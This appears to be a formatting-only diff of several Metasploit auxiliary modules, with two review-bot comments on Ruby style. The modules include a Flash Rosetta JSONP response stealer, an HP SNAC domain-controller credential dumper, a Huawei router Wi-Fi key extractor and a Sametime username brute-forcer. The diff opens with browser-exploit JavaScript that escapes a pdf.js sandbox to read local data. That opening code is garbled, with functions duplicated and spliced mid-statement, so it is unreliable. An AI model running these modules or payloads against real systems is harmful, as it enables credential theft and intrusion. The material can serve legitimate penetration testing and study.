callback = callback.replace(template, value);
}
js_call1 = 'javascript:' + _(function() {
try {
open("%url%", "_self");
} catch (e) {
history.back();
}
undefined;
}, "%url%", path);
js_call2 = 'javascript:;try{updateHidden();}catch(e){};' + callback + ';undefined';
sandboxContext(_(function() {
i = document.getElementById('i');
p = __proto(i.contentDocument.styleSheets[0].ownerNode);
i2 = document.getElementById('i2');
l = p.__lookupSetter__.call(i2.contentWindow, 'location');
l.call(i2.contentWindow, window.wrappedJSObject.js_call1);
}));
setTimeout((function() {
sandboxContext(_(function() {
p = __proto(i.contentDocument.styleSheets[0].ownerNode);
l = p.__lookupSetter__.call(i2.contentWindow, 'location');
l.call(i2.contentWindow, window.wrappedJSObject.js_call2);
}));
}), timeout);
}
function get_data(obj) {
data = null;
try {
data = obj.document.documentElement.innerHTML;
if (data.indexOf('dirListing') < 0) {
throw new Error();
}
} catch (e) {
if (this.document instanceof XMLDocument) {
data = xml2string(this.document);
} else {
try {
if (this.document.body.firstChild.nodeName.toUpperCase() == 'PRE') {
data = this.document.body.firstChild.textContent;
} else {
throw new Error();
function get(path, callback, timeout, template, value) {
callback = _(callback);
if (template && value) {
callback = callback.replace(template, value);
}
js_call1 = 'javascript:' + _(function() {
try {
open("%url%", "_self");
} catch (e) {
history.back();
}
} catch (e) {
undefined;
}, "%url%", path);
js_call2 = 'javascript:;try{updateHidden();}catch(e){};' + callback + ';undefined';
sandboxContext(_(function() {
i = document.getElementById('i');
p = __proto(i.contentDocument.styleSheets[0].ownerNode);
i2 = document.getElementById('i2');
l = p.__lookupSetter__.call(i2.contentWindow, 'location');
l.call(i2.contentWindow, window.wrappedJSObject.js_call1);
}));
setTimeout((function() {
sandboxContext(_(function() {
p = __proto(i.contentDocument.styleSheets[0].ownerNode);
l = p.__lookupSetter__.call(i2.contentWindow, 'location');
l.call(i2.contentWindow, window.wrappedJSObject.js_call2);
}));
}), timeout);
}
function get_data(obj) {
data = null;
try {
if (this.document.body.baseURI.indexOf('pdf.js') >= 0 || data.indexOf('aboutNetError') > -1) {;
return null;
} else {
throw new Error();
data = obj.document.documentElement.innerHTML;
if (data.indexOf('dirListing') < 0) {
throw new Error();
}
} catch (e) {
;;
if (this.document instanceof XMLDocument) {
data = xml2string(this.document);
} else {
try {
if (this.document.body.firstChild.nodeName.toUpperCase() == 'PRE') {
data = this.document.body.firstChild.textContent;
} else {
throw new Error();
}
} catch (e) {
try {
if (this.document.body.baseURI.indexOf('pdf.js') >= 0 || data.indexOf('aboutNetError') > -1) {;
return null;
} else {
throw new Error();
}
} catch (e) {
;;
}
}
}
}
return data;
}
function _(s, template, value) {
s = s.toString().split(/^\\s*function\\s+\\(\\s*\\)\\s*\\{/)[1];
s = s.substring(0, s.length - 1);
if (template && value) {
s = s.replace(template, value);
}
s += __proto;
s += xml2string;
s += get_data;
s = s.replace(/\\s\\/\\/.*\\n/g, "");
s = s + ";undefined";
return s;
}
function get_sandbox_context() {
if (window.my_win_id == null) {
for (var i = 0; i < 20; i++) {
try {
if (window[i].location.toString().indexOf("view-source:") != -1) {
my_win_id = i;
break;
}
} catch (e) {}
}
};
if (window.my_win_id == null)
return;
clearInterval(sandbox_context_i);
object.data = 'view-source:' + blobURL;
window[my_win_id].location = 'data:application/x-moz-playpreview-pdfjs;,';
object.data = 'data:text/html,<'+'html/>';
window[my_win_id].frameElement.insertAdjacentHTML('beforebegin', '<iframe style='+
'"position:absolute; left:-9999px;" onload = "'+_(function(){
window.wrappedJSObject.sandboxContext=(function(cmd) {
with(importFunction.constructor('return this')()) {
return eval(cmd);
}
});
}) + '"/>');
}
var i = document.createElement("iframe");
i.id = "i";
i.width=i.height=0;
i.style='position:absolute;left:-9999px;';
i.src = "data:application/xml,<?xml version=\\"1.0\\"?><e><e1></e1></e>";
document.documentElement.appendChild(i);
i.onload = function() {
if (this.contentDocument.styleSheets.length > 0) {
var i2 = document.createElement("iframe");
i2.id = "i2";
i2.width=i2.height=0;
i2.style='position:absolute;left:-9999px;';
i2.src = "data:application/pdf,";
document.documentElement.appendChild(i2);
pdfBlob = new Blob([''], {
type: 'application/pdf'
});
blobURL = URL.createObjectURL(pdfBlob);
object = document.createElement('object');
object.data = 'data:application/pdf,';
object.onload = (function() {
sandbox_context_i = setInterval(get_sandbox_context, 200);
object.onload = null;
object.data = 'view-source:' + location.href;
return;
});
document.documentElement.appendChild(object);
} else {
this.contentWindow.location.reload();
}
}
}
}
return data;
}
function _(s, template, value) {
s = s.toString().split(/^\\s*function\\s+\\(\\s*\\)\\s*\\{/)[1];
s = s.substring(0, s.length - 1);
if (template && value) {
s = s.replace(template, value);
}
s += __proto;
s += xml2string;
s += get_data;
s = s.replace(/\\s\\/\\/.*\\n/g, "");
s = s + ";undefined";
return s;
}
function get_sandbox_context() {
if (window.my_win_id == null) {
for (var i = 0; i < 20; i++) {
try {
if (window[i].location.toString().indexOf("view-source:") != -1) {
my_win_id = i;
break;
var kill = setInterval(function() {
if (window.sandboxContext) {
clearInterval(kill);
} else {
return;
}
} catch (e) {}
}
};
if (window.my_win_id == null)
return;
clearInterval(sandbox_context_i);
object.data = 'view-source:' + blobURL;
window[my_win_id].location = 'data:application/x-moz-playpreview-pdfjs;,';
object.data = 'data:text/html,<'+'html/>';
window[my_win_id].frameElement.insertAdjacentHTML('beforebegin', '<iframe style='+
'"position:absolute; left:-9999px;" onload = "'+_(function(){
window.wrappedJSObject.sandboxContext=(function(cmd) {
with(importFunction.constructor('return this')()) {
return eval(cmd);
}
});
}) + '"/>');
}
var i = document.createElement("iframe");
i.id = "i";
i.width=i.height=0;
i.style='position:absolute;left:-9999px;';
i.src = "data:application/xml,<?xml version=\\"1.0\\"?><e><e1></e1></e>";
document.documentElement.appendChild(i);
i.onload = function() {
if (this.contentDocument.styleSheets.length > 0) {
var i2 = document.createElement("iframe");
i2.id = "i2";
i2.width=i2.height=0;
i2.style='position:absolute;left:-9999px;';
i2.src = "data:application/pdf,";
document.documentElement.appendChild(i2);
pdfBlob = new Blob([''], {
type: 'application/pdf'
});
blobURL = URL.createObjectURL(pdfBlob);
object = document.createElement('object');
object.data = 'data:application/pdf,';
object.onload = (function() {
sandbox_context_i = setInterval(get_sandbox_context, 200);
object.onload = null;
object.data = 'view-source:' + location.href;
return;
});
document.documentElement.appendChild(object);
} else {
this.contentWindow.location.reload();
}
}
var kill = setInterval(function() {
if (window.sandboxContext) {
clearInterval(kill);
} else {
return;
}
EOJS
EOJS
end
end
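Review bot: The reformatted `resource = ('/' == get_resource[-1, 1]) ? get_resource[0, get_resource.length - 1] : get_resource` line in the URL-building hunk hand-rolls what `String#chomp` already does: `chomp('/')` removes exactly one trailing slash when present and returns the string unchanged otherwise, which is the same result. `resource = get_resource.chomp('/')` reads more clearly and avoids the index arithmetic. The enclosing method starts outside the hunk, so I have not verified its name or other callers.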
@@ -10,33 +10,36 @@ class MetasploitModule < Msf::Auxiliary
include Msf::Auxiliary::Report
def initialize(info = {})
super(update_info(info,
'Name' => 'Flash "Rosetta" JSONP GET/POST Response Disclosure',
'Description' => %q{
A website that serves a JSONP endpoint that accepts a custom alphanumeric
callback of 1200 chars can be abused to serve an encoded swf payload that
steals the contents of a same-domain URL. Flash < 14.0.0.145 is required.
super(
update_info(
info,
'Name' => 'Flash "Rosetta" JSONP GET/POST Response Disclosure',
'Description' => %q{
A website that serves a JSONP endpoint that accepts a custom alphanumeric
callback of 1200 chars can be abused to serve an encoded swf payload that
steals the contents of a same-domain URL. Flash < 14.0.0.145 is required.
This module spins up a web server that, upon navigation from a user, attempts
to abuse the specified JSONP endpoint URLs by stealing the response from
GET requests to STEAL_URLS.
},
'License' => MSF_LICENSE,
'Author' => [
'Michele Spagnuolo', # discovery, wrote rosetta encoder, disclosure
'joev' # metasploit module
],
'References' =>
[
This module spins up a web server that, upon navigation from a user, attempts
to abuse the specified JSONP endpoint URLs by stealing the response from
GET requests to STEAL_URLS.
},
'License' => MSF_LICENSE,
'Author' => [
'Michele Spagnuolo', # discovery, wrote rosetta encoder, disclosure
'joev' # metasploit module
],
'References' => [
['CVE', '2014-4671'],
['URL', 'http://miki.it/blog/2014/7/8/abusing-jsonp-with-rosetta-flash/'],
['URL', 'https://github.com/mikispag/rosettaflash'],
['URL', 'https://www.quaxio.com/jsonp_handcrafted_flash_files/']
],
'DisclosureDate' => '2014-07-08',
'Actions' => [[ 'WebServer', 'Description' => 'Serve exploit via web server' ]],
'PassiveActions' => [ 'WebServer' ],
'DefaultAction' => 'WebServer'))
'DisclosureDate' => '2014-07-08',
'Actions' => [[ 'WebServer', 'Description' => 'Serve exploit via web server' ]],
'PassiveActions' => [ 'WebServer' ],
'DefaultAction' => 'WebServer'
)
)
register_options(
[
@@ -46,7 +49,8 @@ class MetasploitModule < Msf::Auxiliary
OptString.new('STEAL_URLS', [ true, 'A comma-separated list of URLs to steal', '' ]),
OptString.new('URIPATH', [ true, 'The URI path to serve the exploit under', '/' ])
],
self.class)
self.class
)
end
def run
@@ -81,7 +85,7 @@ class MetasploitModule < Msf::Auxiliary
file = store_loot(
"html", "text/plain", cli.peerhost, body, "flash_jsonp_rosetta", "Exfiltrated HTTP response"
)
url = body.lines.first.gsub(/.*?=/,'')
url = body.lines.first.gsub(/.*?=/, '')
print_good "#{body.length} bytes captured from target #{cli.peerhost} on URL:\n#{url}"
print_good "Stored in #{file}"
else
@@ -96,7 +100,7 @@ class MetasploitModule < Msf::Auxiliary
end
def exploit_html
ex_url = URI::DEFAULT_PARSER.escape(get_uri.chomp('/')+'/'+Rex::Text.rand_text_alphanumeric(6+rand(20))+'.log')
ex_url = URI::DEFAULT_PARSER.escape(get_uri.chomp('/') + '/' + Rex::Text.rand_text_alphanumeric(6 + rand(20)) + '.log')
%Q|
<!doctype html>
<html>
+8 -8
@@ -15,21 +15,22 @@ class MetasploitModule < Msf::Auxiliary
def initialize
super(
'Name' => 'HP Operations Manager Perfd Environment Scanner',
'Name' => 'HP Operations Manager Perfd Environment Scanner',
'Description' => %q{
This module will enumerate the process list of a remote machine by abusing
HP Operation Manager's unauthenticated 'perfd' daemon.
},
'Author' => [ 'Roberto Soares Espreto <robertoespreto[at]gmail.com>' ],
'License' => MSF_LICENSE
'Author' => [ 'Roberto Soares Espreto <robertoespreto[at]gmail.com>' ],
'License' => MSF_LICENSE
)
commands_help = ALLOWED_COMMANDS.join(',')
register_options(
[
Opt::RPORT(5227),
OptString.new("COMMANDS", [true, "Command(s) to execute (one or more of #{commands_help})", commands_help])
])
[
Opt::RPORT(5227),
OptString.new("COMMANDS", [true, "Command(s) to execute (one or more of #{commands_help})", commands_help])
]
)
end
def commands
@@ -48,7 +49,6 @@ class MetasploitModule < Msf::Auxiliary
def run_host(target_host)
begin
connect
banner_resp = sock.get_once
if banner_resp && banner_resp =~ /^Welcome to the perfd server/
@@ -10,37 +10,38 @@ class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'HP ProCurve SNAC Domain Controller Credential Dumper',
'Description' => %q{
This module will extract Domain Controller credentials from vulnerable installations of HP
SNAC as distributed with HP ProCurve 4.00 and 3.20. The authentication bypass vulnerability
has been used to exploit remote file uploads. This vulnerability can be used to gather important
information handled by the vulnerable application, like plain text domain controller
credentials. This module has been tested successfully with HP SNAC included with ProCurve
Manager 4.0.
},
'References' =>
[
super(
update_info(
info,
'Name' => 'HP ProCurve SNAC Domain Controller Credential Dumper',
'Description' => %q{
This module will extract Domain Controller credentials from vulnerable installations of HP
SNAC as distributed with HP ProCurve 4.00 and 3.20. The authentication bypass vulnerability
has been used to exploit remote file uploads. This vulnerability can be used to gather important
information handled by the vulnerable application, like plain text domain controller
credentials. This module has been tested successfully with HP SNAC included with ProCurve
Manager 4.0.
},
'References' => [
['URL', 'https://h20566.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_na-c03897409']
],
'Author' =>
[
'Author' => [
'rgod <rgod[at]autistici.org>', # Auth bypass discovered by
'juan vazquez' # Metasploit module
],
'License' => MSF_LICENSE,
'DefaultOptions' =>
{
'License' => MSF_LICENSE,
'DefaultOptions' => {
'SSL' => true,
},
'DisclosureDate' => '2013-09-09'
))
'DisclosureDate' => '2013-09-09'
)
)
register_options(
[
Opt::RPORT(443)
])
]
)
end
def get_domain_info(session)
@@ -86,7 +87,6 @@ class MetasploitModule < Msf::Auxiliary
return results
end
def report_cred(opts)
service_data = {
address: opts[:ip],
@@ -113,9 +113,7 @@ class MetasploitModule < Msf::Auxiliary
create_credential_login(login_data)
end
def run
print_status("Get Domain Info")
session = get_session
@@ -141,8 +139,8 @@ class MetasploitModule < Msf::Auxiliary
end
cred_table = Rex::Text::Table.new(
'Header' => 'Domain Controllers Credentials',
'Indent' => 1,
'Header' => 'Domain Controllers Credentials',
'Indent' => 1,
'Columns' => ['Domain Controller', 'Username', 'Password']
)
@@ -160,6 +158,5 @@ class MetasploitModule < Msf::Auxiliary
print_line
print_line(cred_table.to_s)
end
end
+30 -21
@@ -8,30 +8,34 @@ class MetasploitModule < Msf::Auxiliary
include Msf::Auxiliary::Report
def initialize(info = {})
super(update_info(info,
'Name' => 'Gather PDF Authors',
'Description' => %q{
This module downloads PDF documents and extracts the author's
name from the document metadata.
super(
update_info(
info,
'Name' => 'Gather PDF Authors',
'Description' => %q{
This module downloads PDF documents and extracts the author's
name from the document metadata.
This module expects a URL to be provided using the URL option.
Alternatively, multiple URLs can be provided by supplying the
path to a file containing a list of URLs in the URL_LIST option.
This module expects a URL to be provided using the URL option.
Alternatively, multiple URLs can be provided by supplying the
path to a file containing a list of URLs in the URL_LIST option.
The URL_TYPE option is used to specify the type of URLs supplied.
The URL_TYPE option is used to specify the type of URLs supplied.
By specifying 'pdf' for the URL_TYPE, the module will treat
the specified URL(s) as PDF documents. The module will
download the documents and extract the authors' names from the
document metadata.
By specifying 'pdf' for the URL_TYPE, the module will treat
the specified URL(s) as PDF documents. The module will
download the documents and extract the authors' names from the
document metadata.
By specifying 'html' for the URL_TYPE, the module will treat
the specified URL(s) as HTML pages. The module will scrape the
pages for links to PDF documents, download the PDF documents,
and extract the author's name from the document metadata.
},
'License' => MSF_LICENSE,
'Author' => 'bcoles'))
By specifying 'html' for the URL_TYPE, the module will treat
the specified URL(s) as HTML pages. The module will scrape the
pages for links to PDF documents, download the PDF documents,
and extract the author's name from the document metadata.
},
'License' => MSF_LICENSE,
'Author' => 'bcoles'
)
)
deregister_http_client_options
@@ -41,7 +45,8 @@ class MetasploitModule < Msf::Auxiliary
OptString.new('URL_LIST', [ false, 'File containing a list of target URLs', '' ]),
OptEnum.new('URL_TYPE', [ true, 'The type of URL(s) specified', 'html', [ 'pdf', 'html' ] ]),
OptBool.new('STORE_LOOT', [ false, 'Store authors in loot', true ])
])
]
)
end
def progress(current, total)
@@ -147,8 +152,10 @@ class MetasploitModule < Msf::Auxiliary
pdf_urls = []
urls.each_with_index do |url, index|
next if url.blank?
html = download url
next if html.blank?
doc = Nokogiri::HTML html
doc.search('a[href]').select { |n| n['href'][/(\.pdf$|\.pdf\?)/] }.map do |n|
pdf_urls << URI.join(url, n['href']).to_s
@@ -166,8 +173,10 @@ class MetasploitModule < Msf::Auxiliary
max_len = 256
urls.each_with_index do |url, index|
next if url.blank?
file = download url
next if file.blank?
pdf = StringIO.new
pdf.puts file
author = read pdf
+72 -66
@@ -10,73 +10,75 @@ class MetasploitModule < Msf::Auxiliary
include Msf::Auxiliary::Report
BASIC_INFO = {
'Device Name' => /<DeviceName>(.*)<\/DeviceName>/i,
'Serial Number' => /<SerialNumber>(.*)<\/SerialNumber>/i,
'IMEI' => /<Imei>(.*)<\/Imei>/i,
'IMSI' => /<Imsi>(.*)<\/Imsi>/i,
'ICCID' => /<Iccid>(.*)<\/Iccid>/i,
'Device Name' => /<DeviceName>(.*)<\/DeviceName>/i,
'Serial Number' => /<SerialNumber>(.*)<\/SerialNumber>/i,
'IMEI' => /<Imei>(.*)<\/Imei>/i,
'IMSI' => /<Imsi>(.*)<\/Imsi>/i,
'ICCID' => /<Iccid>(.*)<\/Iccid>/i,
'Hardware Version' => /<HardwareVersion>(.*)<\/HardwareVersion>/i,
'Software Version' => /<SoftwareVersion>(.*)<\/SoftwareVersion>/i,
'WebUI Version' => /<WebUIVersion>(.*)<\/WebUIVersion>/i,
'Mac Address1' => /<MacAddress1>(.*)<\/MacAddress1>/i,
'Mac Address2' => /<MacAddress2>(.*)<\/MacAddress2>/i,
'Product Family' => /<ProductFamily>(.*)<\/ProductFamily>/i,
'Classification' => /<Classify>(.*)<\/Classify>/i
'WebUI Version' => /<WebUIVersion>(.*)<\/WebUIVersion>/i,
'Mac Address1' => /<MacAddress1>(.*)<\/MacAddress1>/i,
'Mac Address2' => /<MacAddress2>(.*)<\/MacAddress2>/i,
'Product Family' => /<ProductFamily>(.*)<\/ProductFamily>/i,
'Classification' => /<Classify>(.*)<\/Classify>/i
}
WAN_INFO = {
'Wan IP Address' => /<WanIPAddress>(.*)<\/WanIPAddress>/i,
'Primary Dns' => /<PrimaryDns>(.*)<\/PrimaryDns>/i,
'Secondary Dns' => /<SecondaryDns>(.*)<\/SecondaryDns>/i
'Primary Dns' => /<PrimaryDns>(.*)<\/PrimaryDns>/i,
'Secondary Dns' => /<SecondaryDns>(.*)<\/SecondaryDns>/i
}
DHCP_INFO ={
'LAN IP Address' => /<DhcpIPAddress>(.*)<\/DhcpIPAddress>/i,
DHCP_INFO = {
'LAN IP Address' => /<DhcpIPAddress>(.*)<\/DhcpIPAddress>/i,
'DHCP StartIPAddress' => /<DhcpStartIPAddress>(.*)<\/DhcpStartIPAddress>/i,
'DHCP EndIPAddress' => /<DhcpEndIPAddress>(.*)<\/DhcpEndIPAddress>/i,
'DHCP Lease Time' => /<DhcpLeaseTime>(.*)<\/DhcpLeaseTime>/i
'DHCP EndIPAddress' => /<DhcpEndIPAddress>(.*)<\/DhcpEndIPAddress>/i,
'DHCP Lease Time' => /<DhcpLeaseTime>(.*)<\/DhcpLeaseTime>/i
}
WIFI_INFO = {
'Wifi WPA pre-shared key' => /<WifiWpapsk>(.*)<\/WifiWpapsk>/i,
'Wifi Auth mode' => /<WifiAuthmode>(.*)<\/WifiAuthmode>/i,
'Wifi WPA pre-shared key' => /<WifiWpapsk>(.*)<\/WifiWpapsk>/i,
'Wifi Auth mode' => /<WifiAuthmode>(.*)<\/WifiAuthmode>/i,
'Wifi Basic encryption modes' => /<WifiBasicencryptionmodes>(.*)<\/WifiBasicencryptionmodes>/i,
'Wifi WPA Encryption Modes' => /<WifiWpaencryptionmodes>(.*)<\/WifiWpaencryptionmodes>/i,
'Wifi WEP Key1' => /<WifiWepKey1>(.*)<\/WifiWepKey1>/i,
'Wifi WEP Key2' => /<WifiWepKey2>(.*)<\/WifiWepKey2>/i,
'Wifi WEP Key3' => /<WifiWepKey3>(.*)<\/WifiWepKey3>/i,
'Wifi WEP Key4' => /<WifiWepKey4>(.*)<\/WifiWepKey4>/i,
'Wifi WEP Key Index' => /<WifiWepKeyIndex>(.*)<\/WifiWepKeyIndex>/i
'Wifi WPA Encryption Modes' => /<WifiWpaencryptionmodes>(.*)<\/WifiWpaencryptionmodes>/i,
'Wifi WEP Key1' => /<WifiWepKey1>(.*)<\/WifiWepKey1>/i,
'Wifi WEP Key2' => /<WifiWepKey2>(.*)<\/WifiWepKey2>/i,
'Wifi WEP Key3' => /<WifiWepKey3>(.*)<\/WifiWepKey3>/i,
'Wifi WEP Key4' => /<WifiWepKey4>(.*)<\/WifiWepKey4>/i,
'Wifi WEP Key Index' => /<WifiWepKeyIndex>(.*)<\/WifiWepKeyIndex>/i
}
def initialize(info={})
super(update_info(info,
'Name' => "Huawei Datacard Information Disclosure Vulnerability",
'Description' => %q{
This module exploits an unauthenticated information disclosure vulnerability in Huawei
SOHO routers. The module will gather information by accessing the /api pages where
authentication is not required, allowing configuration changes as well as information
disclosure, including any stored SMS.
},
'License' => MSF_LICENSE,
'Author' =>
[
def initialize(info = {})
super(
update_info(
info,
'Name' => "Huawei Datacard Information Disclosure Vulnerability",
'Description' => %q{
This module exploits an unauthenticated information disclosure vulnerability in Huawei
SOHO routers. The module will gather information by accessing the /api pages where
authentication is not required, allowing configuration changes as well as information
disclosure, including any stored SMS.
},
'License' => MSF_LICENSE,
'Author' => [
'Jimson K James',
'Tom James <tomsmaily[at]aczire.com>', # Msf module
],
'References' =>
[
'References' => [
['CWE', '425'],
['CVE', '2013-6031'],
['US-CERT-VU', '341526']
],
'DisclosureDate' => '2013-11-11' ))
'DisclosureDate' => '2013-11-11'
)
)
register_options(
[
Opt::RHOST('mobilewifi.home')
])
]
)
end
# Gather basic router information
@@ -93,13 +95,13 @@ class MetasploitModule < Msf::Auxiliary
end
def get_wifi_info
print_status("Getting WiFi Key details...")
res = send_request_raw(
{
'method' => 'GET',
'uri' => '/api/wlan/security-settings',
})
'method' => 'GET',
'uri' => '/api/wlan/security-settings',
}
)
unless is_target?(res)
return
@@ -116,7 +118,7 @@ class MetasploitModule < Msf::Auxiliary
log << "WiFi SSID: #{wifi_ssid}\n"
end
WIFI_INFO.each do |k,v|
WIFI_INFO.each do |k, v|
if resp_body.match(v)
info = $1
print_status("#{k}: #{info}")
@@ -132,13 +134,13 @@ class MetasploitModule < Msf::Auxiliary
end
def get_router_info
print_status("Gathering basic device information...")
res = send_request_raw(
{
'method' => 'GET',
'uri' => '/api/device/information',
})
'method' => 'GET',
'uri' => '/api/device/information',
}
)
unless is_target?(res)
return
@@ -148,7 +150,7 @@ class MetasploitModule < Msf::Auxiliary
print_status("Basic Information")
BASIC_INFO.each do |k,v|
BASIC_INFO.each do |k, v|
if resp_body.match(v)
info = $1
print_status("#{k}: #{info}")
@@ -161,9 +163,10 @@ class MetasploitModule < Msf::Auxiliary
res = send_request_raw(
{
'method' => 'GET',
'uri' => '/api/wlan/basic-settings',
})
'method' => 'GET',
'uri' => '/api/wlan/basic-settings',
}
)
# check whether we got any response from server and proceed.
unless is_target?(res)
@@ -184,9 +187,10 @@ class MetasploitModule < Msf::Auxiliary
print_status("Gathering MAC filters...")
res = send_request_raw(
{
'method' => 'GET',
'uri' => '/api/wlan/mac-filter',
})
'method' => 'GET',
'uri' => '/api/wlan/mac-filter',
}
)
unless is_target?(res)
return
@@ -198,7 +202,7 @@ class MetasploitModule < Msf::Auxiliary
if resp_body.match(/<WifiMacFilterStatus>(.*)<\/WifiMacFilterStatus>/i)
wifi_mac_filter_status = $1
print_status("Wifi MAC Filter Status: #{(wifi_mac_filter_status == '1') ? 'ENABLED' : 'DISABLED'}" )
print_status("Wifi MAC Filter Status: #{(wifi_mac_filter_status == '1') ? 'ENABLED' : 'DISABLED'}")
end
(0..9).each do |i|
@@ -215,9 +219,10 @@ class MetasploitModule < Msf::Auxiliary
print_status("Gathering WAN information...")
res = send_request_raw(
{
'method' => 'GET',
'uri' => '/api/monitoring/status',
})
'method' => 'GET',
'uri' => '/api/monitoring/status',
}
)
unless is_target?(res)
return
@@ -227,7 +232,7 @@ class MetasploitModule < Msf::Auxiliary
print_status('WAN Details')
WAN_INFO.each do |k,v|
WAN_INFO.each do |k, v|
if resp_body.match(v)
info = $1
print_status("#{k}: #{info}")
@@ -239,9 +244,10 @@ class MetasploitModule < Msf::Auxiliary
print_status("Gathering DHCP information...")
res = send_request_raw(
{
'method' => 'GET',
'uri' => '/api/dhcp/settings',
})
'method' => 'GET',
'uri' => '/api/dhcp/settings',
}
)
unless is_target?(res)
return
@@ -261,7 +267,7 @@ class MetasploitModule < Msf::Auxiliary
return
end
DHCP_INFO.each do |k,v|
DHCP_INFO.each do |k, v|
if resp_body.match(v)
info = $1
print_status("#{k}: #{info}")
@@ -8,32 +8,32 @@ class MetasploitModule < Msf::Auxiliary
include Msf::Auxiliary::Report
def initialize(info = {})
super(update_info(info,
'Name' => 'IBM BigFix Relay Server Sites and Package Enum',
'Description' => %q{
This module retrieves masthead, site, and available package information
from IBM BigFix Relay Servers.
},
'Author' =>
[
'HD Moore', # Vulnerability Discovery
super(
update_info(
info,
'Name' => 'IBM BigFix Relay Server Sites and Package Enum',
'Description' => %q{
This module retrieves masthead, site, and available package information
from IBM BigFix Relay Servers.
},
'Author' => [
'HD Moore', # Vulnerability Discovery
'Chris Bellows', # Vulnerability Discovery
'Ryan Hanson', # Vulnerability Discovery
'Jacob Robles' # Metasploit module
],
'References' =>
[
['CVE','2019-4061'],
['URL','https://www.atredis.com/blog/2019/3/18/harvesting-data-from-bigfix-relay-servers']
'References' => [
['CVE', '2019-4061'],
['URL', 'https://www.atredis.com/blog/2019/3/18/harvesting-data-from-bigfix-relay-servers']
],
'DefaultOptions' =>
{
'DefaultOptions' => {
'RPORT' => 52311,
'SSL' => true
'SSL' => true
},
'License' => MSF_LICENSE,
'DisclosureDate' => '2019-03-18' # Blog post date
))
'License' => MSF_LICENSE,
'DisclosureDate' => '2019-03-18'
)
) # Blog post date
register_options [
OptString.new('TARGETURI', [true, 'Path to the BigFix server', '/']),
@@ -115,6 +115,7 @@ class MetasploitModule < Msf::Auxiliary
print_status('Downloading packages')
@files.each do |action, val|
next if val.empty?
res = send_req("bfmirror/downloads/#{action}/0")
next unless res && res.code == 200
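Review bot: The `# Blog post date` comment now trails the outer closing `)` of the `super(update_info(...))` call instead of the `'DisclosureDate' => '2019-03-18'` entry it explains; the autocorrect appears to have carried it along when it split the old `))` line. Keep the comment on the value it documents, `'DisclosureDate' => '2019-03-18' # Blog post date`, and leave both closing parens bare. The same relocation may recur wherever a trailing comment sat on a `))` line elsewhere in this commit, so it is worth a pass over the other modules.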
@@ -10,48 +10,50 @@ class MetasploitModule < Msf::Auxiliary
include Msf::Auxiliary::Report
def initialize(info = {})
super(update_info(info,
'Name' => 'IBM Lotus Notes Sametime User Enumeration',
'Description' => %q{
This module extracts usernames using the IBM Lotus Notes Sametime web
interface using either a dictionary attack (which is preferred), or a
bruteforce attack trying all usernames of MAXDEPTH length or less.
},
'Author' =>
[
super(
update_info(
info,
'Name' => 'IBM Lotus Notes Sametime User Enumeration',
'Description' => %q{
This module extracts usernames using the IBM Lotus Notes Sametime web
interface using either a dictionary attack (which is preferred), or a
bruteforce attack trying all usernames of MAXDEPTH length or less.
},
'Author' => [
'kicks4kittens' # Metasploit module
],
'References' =>
[
'References' => [
[ 'CVE', '2013-3975' ],
[ 'URL', 'http://www-01.ibm.com/support/docview.wss?uid=swg21671201']
],
'DefaultOptions' =>
{
'DefaultOptions' => {
'SSL' => true
},
'License' => MSF_LICENSE,
'DisclosureDate' => '2013-12-27'
))
'License' => MSF_LICENSE,
'DisclosureDate' => '2013-12-27'
)
)
register_options(
[
Opt::RPORT(443),
OptString.new('TARGETURI', [ true, 'The path to the userinfo script', '/userinfo/search']),
OptEnum.new('CHARSET', [true, 'Charset to use for enumeration', 'alpha', ['alpha', 'alphanum', 'num'] ]),
OptEnum.new('CHARSET', [true, 'Charset to use for enumeration', 'alpha', ['alpha', 'alphanum', 'num'] ]),
OptEnum.new('TYPE', [true, 'Specify UID or EMAIL', 'UID', ['UID', 'EMAIL'] ]),
OptPath.new('DICT', [ false, 'Path to dictionary file to use', '']),
OptInt.new('MAXDEPTH', [ true, 'Maximum depth to check during bruteforce', 2])
])
OptPath.new('DICT', [ false, 'Path to dictionary file to use', '']),
OptInt.new('MAXDEPTH', [ true, 'Maximum depth to check during bruteforce', 2])
]
)
register_advanced_options(
[
OptString.new('SpecialChars', [false, 'Specify special chars (e.g. -_+!@&$/\?)', '' ]),
OptString.new('PREFIX', [ false, 'Defines set prefix for each guess (e.g. user)', '']),
OptString.new('SUFFIX', [ false, 'Defines set post for each guess (e.g. _adm)', '']),
OptInt.new('TIMING', [ true, 'Set pause between requests', 0]),
OptInt.new('Threads', [ true, 'Number of test threads', 10])
])
OptString.new('PREFIX', [ false, 'Defines set prefix for each guess (e.g. user)', '']),
OptString.new('SUFFIX', [ false, 'Defines set post for each guess (e.g. _adm)', '']),
OptInt.new('TIMING', [ true, 'Set pause between requests', 0]),
OptInt.new('Threads', [ true, 'Number of test threads', 10])
]
)
end
def setup
@@ -73,7 +75,7 @@ class MetasploitModule < Msf::Auxiliary
end
if datastore['SpecialChars']
datastore['SpecialChars'].chars do | spec |
datastore['SpecialChars'].chars do |spec|
@charset.push(Rex::Text.uri_encode(spec))
end
end
@@ -108,13 +110,13 @@ class MetasploitModule < Msf::Auxiliary
if datastore['TYPE'] == "UID"
random_val = Rex::Text.rand_text_alpha(32)
else
random_val = Rex::Text.rand_text_alpha(32) +"@"+ Rex::Text.rand_text_alpha(16) + ".com"
random_val = Rex::Text.rand_text_alpha(32) + "@" + Rex::Text.rand_text_alpha(16) + ".com"
end
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path),
'method' => 'GET',
'ctype' => 'text/html',
'uri' => normalize_uri(target_uri.path),
'method' => 'GET',
'ctype' => 'text/html',
'vars_get' => {
'mode' => datastore['TYPE'].downcase,
'searchText' => random_val
@@ -187,11 +189,10 @@ class MetasploitModule < Msf::Auxiliary
end
end
end
t.each {|x| x.join }
t.each { |x| x.join }
rescue ::Timeout::Error
ensure
t.each {|x| x.kill rescue nil }
t.each { |x| x.kill rescue nil }
end
end
end
@@ -206,9 +207,9 @@ class MetasploitModule < Msf::Auxiliary
end
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path),
'method' => 'GET',
'ctype' => 'text/html',
'uri' => normalize_uri(target_uri.path),
'method' => 'GET',
'ctype' => 'text/html',
'vars_get' => {
'mode' => datastore['TYPE'].downcase,
'searchText' => tstring
@@ -256,7 +257,7 @@ class MetasploitModule < Msf::Auxiliary
# To find all users the queue must be extended by adding 'aa' through to 'az'
def extend_queue(test_current)
